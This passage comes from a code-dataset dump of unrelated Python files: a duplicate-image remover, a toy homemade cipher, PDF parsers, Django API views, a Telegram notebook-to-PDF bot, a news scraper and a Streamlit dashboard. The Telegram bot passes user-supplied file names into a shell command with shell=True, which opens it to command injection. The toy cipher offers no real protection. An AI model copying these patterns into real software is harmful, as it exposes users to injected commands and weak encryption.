'c'], not a\")\n","repo_name":"openeuler-mirror/A-Ops","sub_path":"aops-check/aops_check/tests/errors/test_startup_error.py","file_name":"test_startup_error.py","file_ext":"py","file_size_in_byte":787,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"77"} +{"seq_id":"13035569881","text":"# This script is used to remove duplicated pictures from a folder and it's sub folders, based on image average hashing\nfrom PIL import Image\nimport imagehash, sqlite3, os, time\n\ndef getListOfFiles(dirName):\n\tlistOfFile = os.listdir(dirName)\n\tallFiles = list()\n\tfor entry in listOfFile:\n\t\tfullPath = os.path.join(dirName, entry)\n\t\tif os.path.isdir(fullPath):\n\t\t\tallFiles = allFiles + getListOfFiles(fullPath)\n\t\telse:\n\t\t\tallFiles.append(fullPath)\n\treturn allFiles\n\nconn = sqlite3.connect(\"dump.db\")\ncur = conn.cursor()\ncur.execute(\"CREATE TABLE IF NOT EXISTS pic(name text, hash text)\")\n\nfileList = getListOfFiles(\"tumblr_new\")\nprint(\"rebuilt file list\")\nlast = time.time()\n\nfor file in fileList:\n\tif time.time() - last > 5:\n\t\tprint(\"Processed \", str(fileList.index(file) / len(fileList) * 100), '%')\n\t\tlast = time.time()\n\ttry:\n\t\thash = str(imagehash.average_hash(Image.open(file), 16))\n\texcept:\n\t\tcontinue\n\tcur.execute(\"SELECT name FROM pic WHERE hash=?\", (hash, ))\n\tresultName = cur.fetchone()\n\tif not resultName:\n\t\tcur.execute(\"INSERT INTO pic(name,hash) VALUES(?,?)\", (file, hash, ))\n\telse:\n\t\tif file == resultName[0]:\n\t\t\tcontinue\n\t\tsizeNew = 
os.path.getsize(file)\n\t\tsizeOld = os.path.getsize(resultName[0])\n\t\tif sizeNew > sizeOld:\n\t\t\tcur.execute(\"UPDATE pic SET name=? WHERE hash=?\", (file, hash, ))\n\t\t\tos.remove(resultName[0])\n\t\t\tprint(\"deleted \", resultName[0])\n\t\telif sizeNew <= sizeOld:\n\t\t\tos.remove(file)\n\t\t\tprint(\"deleted \", file)\nconn.commit()","repo_name":"smdll/My_Utilities","sub_path":"RmPicDups.py","file_name":"RmPicDups.py","file_ext":"py","file_size_in_byte":1453,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"7456335029","text":"import base64\r\nimport numpy as np\r\nimport random\r\ndef split(word):\r\n return [char for char in word]\r\ndef met(x):\r\n switcher={\r\n 'a':2,\r\n 'b':1,\r\n 'c':10,\r\n 'd':16,\r\n 'e':3,\r\n 'f':4,\r\n 'g':12,\r\n 'h':17,\r\n 'i':5,\r\n 'j':6,\r\n 'k':13,\r\n 'l':18,\r\n 'm':21,\r\n 'n':24,\r\n 'o':7,\r\n 'p':8,\r\n 'q':14,\r\n 'r':19,\r\n 's':22,\r\n 't':25,\r\n 'u':11,\r\n 'v':9,\r\n 'w':15,\r\n 'x':20,\r\n 'y':23,\r\n 'z':26,\r\n 'A':2,\r\n 'B':1,\r\n 'C':10,\r\n 'D':16,\r\n 'E':3,\r\n 'F':4,\r\n 'G':12,\r\n 'H':17,\r\n 'I':5,\r\n 'J':6,\r\n 'K':13,\r\n 'L':18,\r\n 'M':21,\r\n 'N':24,\r\n 'O':7,\r\n 'P':8,\r\n 'Q':14,\r\n 'R':19,\r\n 'S':22,\r\n 'T':25,\r\n 'U':11,\r\n 'V':9,\r\n 'W':15,\r\n 'X':20,\r\n 'Y':23,\r\n 'Z':26,\r\n '0':0,\r\n '1':1,\r\n '2':2,\r\n '3':3,\r\n '4':4,\r\n '5':5,\r\n '6':6,\r\n '7':7,\r\n '8':8,\r\n '9':9\r\n }\r\n return switcher.get(x)\r\nprint(\"\\t\\t\\t\\t\\t\\t\\t\\t\\tSIMPLE MATRIX ENCRYPTION TECHNIQUE\")\r\nprint(\"\\nENCRYPTION:\\n\")\r\nplain_txt = input(\"Enter text to be encrypted:\")\r\nplain_txt_bytes = plain_txt.encode(\"ascii\")\r\n\r\nbase64_bytes = base64.b64encode(plain_txt_bytes)\r\nbase64_string = base64_bytes.decode(\"ascii\")\r\n\r\nprint(f\"\\nEncoded string: {base64_string}\\n\")\r\n\r\nl= len(base64_string)\r\nc=base64_string.count(\"=\")\r\nl=l-c\r\ncode=base64_string[0:l]\r\ns=(l%3)+2\r\nsubstrings = [code[i:i+s] for i in range(0, l, s)]\r\n#print(substrings)\r\nnlist=[code[i:i+s] for i in range(0,l,s)]\r\n\r\nfor x in range(len(substrings)):\r\n substrings[x]=split(substrings[x])\r\n\r\nfor x in range(len(nlist)):\r\n nlist[x]=split(nlist[x])\r\n\r\nfor i in range(len(substrings)):\r\n for j in range(len(substrings[i])):\r\n substrings[i][j]=met(substrings[i][j])\r\n\r\n#print(substrings)\r\n\r\nwhile len(substrings[len(substrings)-1])!=len(substrings[len(substrings)-2]):\r\n substrings[len(substrings)-1].append(1)\r\nm=len(substrings)%s\r\nt=s-m\r\nif s==2:\r\n while t!=0:\r\n substrings.append([1,1])\r\n t-=1\r\n \r\nelif s==3:\r\n while t!=0:\r\n substrings.append([1,1,1])\r\n t-=1\r\n\r\nelif s==4:\r\n while t!=0:\r\n substrings.append([1,1,1,1])\r\n t-=1\r\n \r\n\r\n#print(substrings)\r\n\r\ndetm=[]\r\nif s==2:\r\n for i in range(0,len(substrings),s):\r\n arr2=np.array([substrings[i],substrings[i+1]])\r\n #print(arr)\r\n D = np.linalg.det(arr2)\r\n detm.append(round(D%26))\r\n print(\"Determinants:\",detm)\r\n\r\nelif s==3:\r\n for i in range(0,len(substrings),s):\r\n arr3=np.array([substrings[i],substrings[i+1],substrings[i+2]])\r\n #print(arr)\r\n D = np.linalg.det(arr3)\r\n detm.append(round(D%26))\r\n print(\"Determinants:\",detm)\r\n\r\nelif s==4:\r\n for i in range(0,len(substrings),s):\r\n arr4=np.array([substrings[i],substrings[i+1],substrings[i+2],substrings[i+3]])\r\n #print(arr)\r\n D = np.linalg.det(arr4)\r\n detm.append(round(D%26))\r\n print(\"Determinants:\",detm)\r\nr=random.randint(1,99)\r\nprint(\"\\nSecret 
key:\",r)\r\nfor i in range(len(detm)):\r\n if len(detm)%2==0 :\r\n res = [x + r*i for x in detm]\r\n else:\r\n res = [x - r*i for x in detm]\r\nprint(\"\\nEncrypted determinants:\" + str(res))\r\n#print(nlist)\r\nk=0\r\ncnt=0\r\nf1=[]\r\n\r\nfor i in range(len(nlist)):\r\n for j in range(len(nlist[i])):\r\n if ord(nlist[i][j])>=65 and ord(nlist[i][j])<=90:\r\n d=ord(nlist[i][j])\r\n x=d-64\r\n #print(x)\r\n A=x+detm[k]\r\n if A>26:\r\n A-=26\r\n A=chr(A+64)\r\n #nlist[i][j]=A\r\n f1.append(A)\r\n \r\n elif ord(nlist[i][j])>=97 and ord(nlist[i][j])<=122:\r\n l=ord(nlist[i][j])\r\n p=l-96\r\n #print(p)\r\n b=p-detm[k]\r\n if b<=0:\r\n b+=26\r\n b=chr(b+96)\r\n #nlist[i][j]=a\r\n f1.append(b)\r\n \r\n elif ord(nlist[i][j])>=48 and ord(nlist[i][j])<=57:\r\n m=ord(nlist[i][j])\r\n n=m-48\r\n #print(n)\r\n #nlist[i][j]=m\r\n if n%2==0:\r\n n+=4\r\n if n>9:\r\n n-=10\r\n else:\r\n n-=4\r\n if n<0:\r\n n+=10\r\n \r\n f1.append(str(n))\r\n \r\n cnt+=1\r\n \r\n if cnt==(s*s):\r\n k+=1\r\n cnt=0\r\n \r\n#print(f1) \r\nct=\"\"\r\nct=ct.join(f1)\r\n#print(ct)\r\n\r\nprint(\"\\nENCRYPTED CODE:\",ct,\",\",str(res))\r\n\r\n#DECRYPTION\r\nfor i in range(len(res)):\r\n if len(res)%2==0 :\r\n dd = [x - r*i for x in res]\r\n else:\r\n dd = [x + r*i for x in res]\r\nprint(\"\\n\\nDECRYPTION:\\n\")\r\nprint(\"Decrypted determinants:\" + str(dd))\r\n\r\nf=(len(ct)%3)+2\r\ndstr = [ct[i:i+s] for i in range(0,len(ct),f)]\r\n#print(dstr)\r\nfor x in range(len(dstr)):\r\n dstr[x]=split(dstr[x])\r\n#print(dstr)\r\n\r\n\r\n\r\ndk=0\r\ndcnt=0\r\ndf1=[]\r\n\r\nfor i in range(len(dstr)):\r\n for j in range(len(dstr[i])):\r\n if ord(dstr[i][j])>=65 and ord(dstr[i][j])<=90:\r\n d=ord(dstr[i][j])\r\n x=d-64\r\n #print(x)\r\n A=x-dd[dk]\r\n if A<=0:\r\n A+=26\r\n A=chr(A+64)\r\n #nlist[i][j]=A\r\n df1.append(A)\r\n \r\n elif ord(dstr[i][j])>=97 and ord(dstr[i][j])<=122:\r\n l=ord(dstr[i][j])\r\n p=l-96\r\n #print(p)\r\n b=p+dd[dk]\r\n if b>26:\r\n b-=26\r\n b=chr(b+96)\r\n #nlist[i][j]=a\r\n df1.append(b)\r\n \r\n elif ord(dstr[i][j])>=48 and ord(dstr[i][j])<=57:\r\n m=ord(dstr[i][j])\r\n n=m-48\r\n #print(n)\r\n #nlist[i][j]=m\r\n if n%2==0:\r\n n-=4\r\n if n<0:\r\n n+=10\r\n else:\r\n n+=4\r\n if n>9:\r\n n-=10\r\n \r\n df1.append(str(n))\r\n \r\n dcnt+=1\r\n \r\n if dcnt==(s*s):\r\n dk+=1\r\n dcnt=0\r\n \r\n#print(df1)\r\ndt=\"\"\r\ndt=dt.join(df1)\r\nwhile c!=0:\r\n dt=dt + \"=\"\r\n c-=1\r\nprint(\"\\nDECRYPTED CODE:\",dt)\r\n\r\ndbase64_bytes = dt.encode(\"ascii\")\r\n\r\ndstring_bytes = base64.b64decode(dbase64_bytes)\r\ndstring = dstring_bytes.decode(\"ascii\")\r\n\r\nprint(f\"\\nDECRYPTED MESSAGE: {dstring}\")\r\n\r\n\r\n","repo_name":"Rahulvr7/MET","sub_path":"src.py","file_name":"src.py","file_ext":"py","file_size_in_byte":6600,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"31611321889","text":"import re\nimport fitz\nfrom tika import parser\n\n\ndef parse_pdf(file_path, write=True):\n \"\"\"\n Extracts text from pdf files while using tika parser\n\n :param file_path: file to be parsed\n :param write: write output to hard disk\n :return: list of strings\n \"\"\"\n rawText = parser.from_file(file_path)\n rawList = rawText[\"content\"].splitlines()\n\n rawTextClean = re.compile(r\"[\"\n r\"\\t\"\n # r\"\\d\"\n r\"]+\")\n\n remove_special_chars = re.compile(r\"^\\W \")\n remove_punc = re.compile(r\"[\\.,/:()\\[\\]\\\\%!?_] ?| ?[\\.,/:()\\[\\]\\\\%!?_]|^–\")\n remove_multiple_ws = re.compile(r\" +\")\n\n cleanList = [x for x in rawList if x]\n 
print(cleanList)\n cleanList = [re.sub(rawTextClean, \" \", x).strip() for x in cleanList]\n cleanList = [re.sub(remove_special_chars, \"\", x).strip() for x in cleanList if x]\n print(cleanList)\n # cleanList = [re.sub(remove_punc, \" \", x).strip() for x in cleanList if x]\n # print(*cleanList, sep=\"\\n\")\n print(cleanList)\n cleanList = [re.sub(remove_multiple_ws, \" \", x).strip() for x in cleanList if x]\n print(*cleanList, sep=\"\\n\")\n\n if write:\n file_out = file_path.replace(\"bewerbungen_raw\\\\\", \"bewerbungen_raw\\\\output\\\\\")\n out_file = open(file_out.replace(\".pdf\", \".txt\"), \"w\", encoding=\"utf-8\")\n for line in cleanList:\n out_file.write(line + \"\\n\")\n\n return cleanList\n\n\ndef parse_pymupdf(file_path, multi_line=True):\n \"\"\"\n extracts text from pdf file while using pymupdf (fitz) and returns a (single line) string\n\n :param multi_line: boolean for deciding if output is single line string or list of strings\n :param file_path: file to be parsed\n :return: text as single line string or list of strings\n \"\"\"\n doc = fitz.open(file_path)\n text = \"\"\n for page in doc:\n text = text + str(page.getText())\n if multi_line:\n output = text.split(\"\\n\")\n else:\n output = \" \".join(text.split(\"\\n\"))\n output = re.sub(r\" +\", \" \", output).strip()\n\n return output\n\n\n\n","repo_name":"Marshmellow24/CoverletterGen","sub_path":"python/NER/Data_Parsing/pdf_extraction.py","file_name":"pdf_extraction.py","file_ext":"py","file_size_in_byte":2097,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"7403987561","text":"from datetime import datetime\nfrom drf_spectacular.utils import extend_schema, OpenApiExample, OpenApiParameter\nfrom rest_framework import generics\nfrom rest_framework import permissions\nfrom rest_framework import status\nfrom rest_framework.response import Response\nfrom rest_framework.views import APIView\n\nfrom automations.models import ClassifiedOccurrence, COUsage\nfrom db_materials.models import MaterialElement, MEUsage\nfrom db_materials.serializers import MEUsageSerializer, ScaffoldingRequestSerializer\n\n\nclass MEUsageAPIView(generics.ListAPIView):\n queryset = MEUsage.objects.all()\n serializer_class = MEUsageSerializer\n permission_classes = [permissions.IsAuthenticated, permissions.IsAdminUser]\n\n\nclass ScaffoldingAPIView(APIView):\n permission_classes = [permissions.IsAuthenticated, permissions.IsAdminUser]\n\n @extend_schema(\n parameters=[\n OpenApiParameter(name='ontology_term',\n description='A term to return links for',\n type=str,\n examples=[\n OpenApiExample('\\'metre\\''),\n OpenApiExample('\\'second\\'')\n ]),\n OpenApiParameter(name='distinction_ontology_term',\n required=False,\n description='An optional term to return distinction links with the required term for',\n type=str,\n examples=[\n OpenApiExample('\\'centimetre\\''),\n OpenApiExample('\\'millisecond\\'')\n ]),\n OpenApiParameter(name='link_type',\n required=False,\n description='Required type of link between ontology and material element. '\n 'Must by one of [\"any\", \"definition\", \"example\", \"distinction\", \"other\"]. '\n 'Default is \"any\"',\n type=str),\n OpenApiParameter(name='number_of_responses',\n required=False,\n description='Number of material elements to return. '\n 'Must be non-negative. If 0, all the links are returned. 
Default is 1',\n type=int),\n ],\n request=ScaffoldingRequestSerializer\n )\n def post(self, request, format=None):\n serializer = ScaffoldingRequestSerializer(data=request.data)\n if not serializer.is_valid():\n return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)\n data = serializer.validated_data\n if 'link_type' in data and data['link_type'] == 'distinction':\n if 'distinction_ontology_term' not in data:\n return Response('Error: distinction_ontology_term is required when link_type is distinction',\n status=status.HTTP_400_BAD_REQUEST)\n relevant_material_elements = \\\n MaterialElement.objects.filter(\n ontology_term=data['ontology_term']).filter(\n distinction_ontology_term=data['distinction_ontology_term'])\n relevant_classified_occurrences = ClassifiedOccurrence.objects.filter(\n occurrence__ontology_term__term=data['ontology_term']).filter(\n distinction_ontology_term=data['distinction_ontology_term']).filter(\n is_approved=True).order_by('relevance')\n else:\n relevant_material_elements = MaterialElement.objects.filter(\n ontology_term=data['ontology_term'])\n relevant_classified_occurrences = ClassifiedOccurrence.objects.filter(\n occurrence__ontology_term__term=data['ontology_term']).filter(\n is_approved=True).order_by('relevance')\n if 'link_type' in data and data['link_type'] != 'any':\n relevant_material_elements = relevant_material_elements.filter(\n material_element_type=data['link_type'])\n relevant_classified_occurrences = relevant_classified_occurrences.filter(\n occurrence_type=data['link_type']).filter(is_approved=True).order_by('relevance')\n contents = []\n if 'number_of_responses' not in data:\n len_contents = min(1, len(relevant_material_elements) + len(relevant_classified_occurrences))\n elif data['number_of_responses'] == 0:\n len_contents = len(relevant_material_elements) + len(relevant_classified_occurrences)\n else:\n len_contents = min(data['number_of_responses'],\n len(relevant_material_elements) + len(relevant_classified_occurrences))\n for i in range(0, len_contents):\n if i < len(relevant_material_elements):\n contents.append(create_html_snippet(relevant_material_elements[i].ontology_term,\n relevant_material_elements[i].content))\n MEUsage.objects.create(material_element=relevant_material_elements[i], usage_time=datetime.now())\n else:\n j = i - len(relevant_material_elements)\n contents.append(create_html_snippet(relevant_classified_occurrences[j].occurrence.ontology_term.term,\n relevant_classified_occurrences[j].snippet))\n COUsage.objects.create(classified_occurrence=relevant_classified_occurrences[j],\n usage_time=datetime.now())\n\n return Response(contents)\n\n\ndef create_html_snippet(term, snippet):\n with open('./static/scaffolding_response.html', 'r') as f:\n file_text = f.read()\n return file_text.replace('{{ term }}', term).replace('{{ snippet }}', snippet)\n","repo_name":"Nikita-A-Tatarinov/ITS_materials","sub_path":"db_materials/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":5973,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"20828349239","text":"from telegram.ext import Updater, MessageHandler, Filters, CommandHandler\nimport subprocess\nimport telegram\nimport json\nimport os\nimport re\nimport logging\nimport platform\nimport emoji\nfrom utils import BotLogs\n\n# Enable logging\nlogging.basicConfig(format='%(asctime)s - %(name)s - %(levelname)s - \\\n %(message)s', level=logging.INFO)\nlogger = 
logging.getLogger(__name__)\nlogger.setLevel(logging.DEBUG)\n\n\nDATA_FOLDER = \"data\"\nPROXY_URL = None\nif platform.system() == 'Darwin':\n PROXY_URL = 'socks5://127.0.0.1:9050'\nelif platform.system() == 'Linux':\n PROXY_URL = 'socks5h://127.0.0.1:9050'\n\n# botlogger = BotLogs(\"bot_logger\", \"bot.log\")\n\nhelp_text = list()\nhelp_text.append(\"Этот бот позволяет конвертировать *.ipynb* в *.pdf* -- просто пришл�� мне *.ipynb* файл\")\nhelp_text.append('')\nhelp_text.append(\"Команда /files выводит список файлов в твоей директории и позволяет скачать нужный файл\")\nhelp_text = '\\n'.join(help_text)\n\nstart_text = list()\nstart_text.append(\"Привет!\")\nstart_text.append(help_text)\nstart_text.append('')\nstart_text.append(\"Возможно, тебе также будет интересно подписаться на канал @akarazeevchannel\")\nstart_text.append(emoji.emojize(\"Если возникнут трудности/будут пожелания или замечания, то направляй их пожалуйста @akarazeev :relieved:\", use_aliases=True))\nstart_text = '\\n'.join(start_text)\n\nbrackets_text = \"Убери скобочки из названия файла, пожалуйста. И пришли заново\"\nemptyfolder_text = \"Файлы отсутствуют. Пришли мне что-нибудь\"\n\n\ndef get_token():\n with open(\"token.json\") as jsn:\n data = json.load(jsn)\n return data[\"token\"]\n\n\ndef converter(bot, update):\n # global botlogger\n file_path = None\n\n chat_dir = os.path.join(DATA_FOLDER, str(update.message.chat_id))\n\n if not os.path.exists(chat_dir):\n os.mkdir(chat_dir)\n\n if update.message.document is not None:\n # Document case.\n file_name = update.message.document.file_name\n\n if re.compile(r'[\\(\\)\\[\\]]').search(file_name):\n update.message.reply_text(brackets_text)\n return\n\n if file_name[-6:].lower() != \".ipynb\":\n update.message.reply_text(help_text)\n return\n\n file = bot.get_file(update.message.document.file_id)\n file_path = os.path.join(chat_dir, file_name)\n file.download(file_path)\n else:\n update.message.reply_text(\"Error\")\n return\n\n file_path = os.path.realpath(file_path)\n\n users_number = len(os.listdir('data/'))\n\n update.message.reply_text(f\"Конвертирую...\\nПока ты ждёшь -- можешь почитать @akarazeevchannel :)\\n\\nСтатистика показывает, что примерное число активных пользователей: *{users_number}*\", parse_mode=telegram.ParseMode.MARKDOWN)\n print(file_path)\n # bash_command = \"source /home/anton/.envs/ipy/bin/activate && cd /home/anton/WD/ipy2pdf/ && python3 ipy2pdf '{}'\".format(file_path)\n bash_command = \"cd /home/anton/WD/ipy2pdf/ && python3 ipy2pdf '{}'\".format(file_path)\n print(bash_command)\n process = subprocess.Popen(bash_command, stdout=subprocess.PIPE, shell=True)\n process.communicate()\n print(\"Converted!\")\n\n pdf_path = file_path.replace(\".ipynb\", \".pdf\")\n\n with open(pdf_path, 'rb') as f:\n update.message.reply_document(f)\n\n # botlogger.add_msg(\"user {} send {}\".format(str(update.message.chat_id), file_name))\n\n # update.message.reply_text(make_info())\n\n\n# def make_info():\n# global botlogger\n# reqs = str(botlogger.number_of_requests())\n# firstdate = botlogger.first_date()\n# msg = '{} requests since launch ({})'.format(reqs, firstdate)\n# return msg\n\n\n# def info(bot, update):\n# msg = make_info()\n# update.message.reply_text(msg)\n\n\ndef get_chat_dir(chat_id):\n return os.path.join(DATA_FOLDER, str(chat_id))\n\n\ndef get_files_list(chat_dir):\n \"\"\"Short summary.\n\n Args:\n chat_dir (str): Path to user's folder.\n\n Returns:\n list: List of pairs (number, filename)\n\n \"\"\"\n print(chat_dir)\n chat_dir_list = 
os.listdir(chat_dir)\n chat_dir_list = sorted(list(filter(lambda x: not x.startswith('.'), chat_dir_list)))\n chat_dir_list = list(enumerate(chat_dir_list))\n return chat_dir_list\n\n\ndef files(bot, update):\n chat_dir = get_chat_dir(update.message.chat_id)\n\n try:\n if not os.path.exists(chat_dir):\n raise Exception\n\n chat_dir_list = get_files_list(chat_dir)\n\n if len(chat_dir_list) == 0:\n raise Exception\n\n response_text = list()\n response_text.append(\"Содержимое твоей папки:\")\n for number, filename in chat_dir_list:\n response_text.append(f'- *{filename}* --скачать--> /{number}')\n response_text = '\\n'.join(response_text)\n update.message.reply_text(response_text, parse_mode=telegram.ParseMode.MARKDOWN)\n except Exception as e:\n update.message.reply_text(emptyfolder_text)\n\n\ndef choose_file(bot, update):\n command = update.message.text\n chat_id = update.message.chat_id\n\n file_number = int(command[1:])\n chat_dir = get_chat_dir(chat_id)\n chat_dir_list = get_files_list(chat_dir)\n filename = chat_dir_list[file_number][1]\n\n update.message.reply_text(f'Ты просишь меня скачать файл *{filename}*, который имеет порядковый номер *{file_number}* в директории. Окей...', parse_mode=telegram.ParseMode.MARKDOWN)\n with open(os.path.join(get_chat_dir(chat_id), filename), 'rb') as f:\n update.message.reply_document(f)\n\n\ndef info(bot, update):\n users_number = len(os.listdir('data/'))\n update.message.reply_text(f\"Конвертирую...\\nПока ты ждёшь -- можешь почитать @akarazeevchannel :)\\n\\nСтатистика показывает, что примерное число активных пользователей: *{users_number}*\", parse_mode=telegram.ParseMode.MARKDOWN)\n\n\ndef help(bot, update):\n update.message.reply_text(help_text, parse_mode=telegram.ParseMode.MARKDOWN)\n\n\ndef start(bot, update):\n update.message.reply_text(start_text, parse_mode=telegram.ParseMode.MARKDOWN)\n\n\ndef main():\n token = get_token()\n print('-> USE PROXY')\n req = telegram.utils.request.Request(proxy_url=PROXY_URL,\n read_timeout=30, connect_timeout=20,\n con_pool_size=10)\n bot = telegram.Bot(token=token, request=req)\n\n updater = Updater(bot=bot)\n dp = updater.dispatcher\n\n # route updates: plain text -> help, documents -> converter, unknown /commands -> choose_file\n dp.add_handler(CommandHandler(\"files\", files))\n dp.add_handler(CommandHandler(\"info\", info))\n dp.add_handler(CommandHandler(\"help\", help))\n dp.add_handler(CommandHandler(\"start\", start))\n dp.add_handler(MessageHandler(Filters.text, help))\n dp.add_handler(MessageHandler(Filters.document, converter))\n dp.add_handler(MessageHandler(Filters.command, choose_file))\n\n updater.start_polling()\n updater.idle()\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"akarazeevprojects/ipy2pdf","sub_path":"bot.py","file_name":"bot.py","file_ext":"py","file_size_in_byte":7491,"program_lang":"python","lang":"ru","doc_type":"code","stars":19,"dataset":"github-code","pt":"77"}
{"seq_id":"42392987027","text":"import requests\nfrom bs4 import BeautifulSoup\nimport csv\n\nresponse = requests.get('https://g1.globo.com/')\ndata = response.content\n\n\"\"\"Fetch the page content with requests and tell BeautifulSoup,\nvia the 'html.parser' argument below, that this content is HTML\n\"\"\"\n\nsite = BeautifulSoup(data, 'html.parser')\nnews = site.findAll('div', attrs={'class': 'feed-post-body'})\n\n\"\"\"findAll() returns a list-like object that can be iterated over\n\"\"\"\n\n\nwith open('noticias.csv', 'a', newline=\"\") as arquivo:\n \"\"\"first open the file for writing (append mode)\n \"\"\"\n with 
open('noticias.csv') as aqr:\n \"\"\"open the same file in read mode\n \"\"\"\n escrevendo = csv.DictWriter(\n arquivo, fieldnames=['Titulo', 'Subtitulo', 'Link'])\n if len(aqr.read()) == 0:\n \"\"\"check whether the .csv file is empty; if so, call writeheader() to write the header row\n \"\"\"\n escrevendo.writeheader()\n for new in news:\n title = new.find(\n 'a', attrs={'class': 'feed-post-link gui-color-primary gui-color-hover'})\n subtitle = new.find('a', attrs={\n 'class': 'gui-color-primary gui-color-hover feed-post-body-title bstn-relatedtext'})\n if subtitle:\n \"\"\"\n check whether the story has a subtitle\n \"\"\"\n escrevendo.writerow(\n {'Titulo': title.text, 'Subtitulo': subtitle.text, 'Link': title['href']})\n else:\n escrevendo.writerow(\n {'Titulo': title.text, 'Subtitulo': 'Sem subtitulo', 'Link': title['href']})\n","repo_name":"w1llx1m/modulo_git","sub_path":"data.py","file_name":"data.py","file_ext":"py","file_size_in_byte":1656,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"}
{"seq_id":"6527981103","text":"import pandas as pd\nimport datetime\nimport streamlit as st\nimport plotly.graph_objects as go\nimport time\nimport dashboard_features as dbf\n\nst.set_page_config(\n page_title=\"Investor Dashboard\",\n page_icon=\"📈\",\n layout=\"wide\"\n)\n\n# Read in portfolio data\nportfolio_df = pd.read_excel(\"./portfolio_example.xlsx\")\n\n# Header\nst.write(\"# Portfolio Overview\")\nst.write(\"Current performance of your investment portfolio...\")\nst.write(\"\")\nst.write(\"\")\n\nst.sidebar.write(\"Feature below is under construction.\")\n# Sidebar for stock transaction\nbuysell_stock = st.sidebar.selectbox(\n \"Select stock to buy or sell.\",\n (\"TSLA\",\"AAPL\",\"MSFT\",\"AMZN\",\"JNJ\")\n)\n\n# Quantity input\namount = st.sidebar.number_input(\"Quantity\", min_value=0)\n\n#Buy or Sell w/ transact button\nbuysell = st.sidebar.selectbox(\"Would you like to buy or sell?\", (\"Buy\", \"Sell\"))\nif st.sidebar.button(\"Transact\"):\n\n if buysell_stock == \"TSLA\":\n buysell_stock = 0\n elif buysell_stock == \"AAPL\":\n buysell_stock = 1\n elif buysell_stock == \"MSFT\":\n buysell_stock = 2\n elif buysell_stock == \"AMZN\":\n buysell_stock = 3\n else: #buysell_stock == \"JNJ\":\n buysell_stock = 4\n\n if buysell == \"Buy\":\n #can add check balance feature\n #dbf.buy_stock(amount, buysell_stock, portfolio_df)\n st.sidebar.success(\"Transaction confirmed!\", icon = \"✅\") \n elif buysell == \"Sell\" and amount <= portfolio_df.at[buysell_stock, 'QUANTITY']:\n #dbf.sell_stock(amount, buysell_stock, portfolio_df)\n st.sidebar.success(\"Transaction confirmed!\", icon = \"✅\")\n elif buysell == \"Sell\" and amount > portfolio_df.at[buysell_stock, 'QUANTITY']:\n st.sidebar.write(\"Transaction canceled.\")\n st.sidebar.write(\" Warning: you do not have enough shares to sell; enter a quantity at or below your current holding. 
\")\n\n\n\n\n\n# Live dashboard\nplaceholder = st.empty()\n\nfor seconds in range(100):\n\n # Update ticker price & info in df (DASHBOARD FEATURES)\n dbf.update_df(portfolio_df)\n unrealized_pl = portfolio_df['UNREALIZED P&L'].sum()\n current_pf_value = portfolio_df['CURRENT VALUE'].sum()\n \n\n with placeholder.container():\n\n fig_col1, fig_col2, fig_col3, fig_col4, fig_col5 = st.columns([5.5,0.25,1,0.25,1], gap='small')\n #col2 and col4 acts as placeholders/spacers for adjacent columns\n \n # Nested Pie Chart\n with fig_col1:\n st.write(dbf.fig1(portfolio_df))\n\n #Total Asset Performance Indicator\n with fig_col3:\n st.metric(\n label=\"Total Assets\", \n value = round(current_pf_value, 2),\n delta = str(round(unrealized_pl, 2))\n )\n\n #Daily Stock Performance Indicator\n with fig_col5:\n st.metric(\n label=\"TSLA (Daily)\", \n value = round(portfolio_df.at[0,'CURRENT PRICE'], 2),\n delta = round(portfolio_df.at[0,'CURRENT PRICE'] - dbf.prev_close('TSLA'), 2)\n )\n\n st.metric(\n label=\"AAPL (Daily)\", \n value = round(portfolio_df.at[1,'CURRENT PRICE'], 2),\n delta = round(portfolio_df.at[1,'CURRENT PRICE'] - dbf.prev_close('AAPL'), 2)\n )\n st.metric(\n label=\"MSFT (Daily)\", \n value = round(portfolio_df.at[2,'CURRENT PRICE'], 2),\n delta = round(portfolio_df.at[2,'CURRENT PRICE'] - dbf.prev_close('MSFT'), 2)\n )\n st.metric(\n label=\"AMZN (Daily)\", \n value = round(portfolio_df.at[3,'CURRENT PRICE'], 2),\n delta =round(portfolio_df.at[3,'CURRENT PRICE'] - dbf.prev_close('AMZN'), 2)\n )\n st.metric(\n label=\"JNJ (Daily)\", \n value = round(portfolio_df.at[4,'CURRENT PRICE'], 2),\n delta = round(portfolio_df.at[4,'CURRENT PRICE'] - dbf.prev_close('JNJ'), 2)\n )\n\n st.write(\"\") \n\n st.dataframe(portfolio_df)\n\n st.write(\"### Portfolio Performance\")\n st.write(dbf.fig2(dbf.pf_performance(portfolio_df)))\n st.dataframe(dbf.pf_performance(portfolio_df))\n \n\n time.sleep(5)","repo_name":"kvpcrypto/InvestorDashboard","sub_path":"Portfolio.py","file_name":"Portfolio.py","file_ext":"py","file_size_in_byte":4233,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"38126856914","text":"import os\nimport unittest\nimport pandas as pd\nfrom ..main import CarDataNormalizer, CarDataReporter\n\n\nclass CarDataNormalizerTest(unittest.TestCase):\n\n def setUp(self) -> None:\n self.normalizer = CarDataNormalizer(\"adastra_cars_task/tests/test_cars.json\")\n\n def test_fill_miles_per_gallon_missing_values(self):\n # there are 6 other missing values in a different column\n expected_missing_values_in_dataframe = 6\n self.normalizer._CarDataNormalizer__fill_miles_per_gallon_missing_values()\n self.assertEqual(expected_missing_values_in_dataframe, self.normalizer.cars_dataframe.isnull().values.sum())\n\n def test_fill_horsepower_missing_values(self):\n expected_missing_values_in_dataframe = 8\n self.normalizer._CarDataNormalizer__fill_horsepower_missing_values()\n self.assertEqual(expected_missing_values_in_dataframe, self.normalizer.cars_dataframe.isnull().values.sum())\n\n def test_convert_date_string_to_date_type(self):\n self.normalizer._CarDataNormalizer__convert_date_string_to_date_type()\n self.assertEqual(\"datetime64[ns]\", 